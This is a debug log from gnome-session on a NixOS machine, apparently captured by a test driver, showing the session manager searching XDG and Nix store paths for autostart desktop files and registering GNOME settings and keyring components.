machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.UsbProtection.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App15 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Wacom.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/xdg-user-dirs.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App24 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/gnome-keyring-pkcs11.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App25 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.PrintNotifications.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/gnome-keyring-ssh.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App27 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App16 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/gnome-keyring-secrets.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'gnome-keyring-secrets.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Wacom.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Rfkill.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App17 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Done adding required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.config/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /home/alice/.config/autostart/gnome-keyring-secrets.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App18 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.nix-profile/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/profile/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.local/state/nix/profile/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /etc/profiles/per-user/alice/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/var/nix/profiles/default/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /run/current-system/sw/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.nix-profile/etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/profile/etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.local/state/nix/profile/etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /etc/profiles/per-user/alice/etc/xdg/autostart
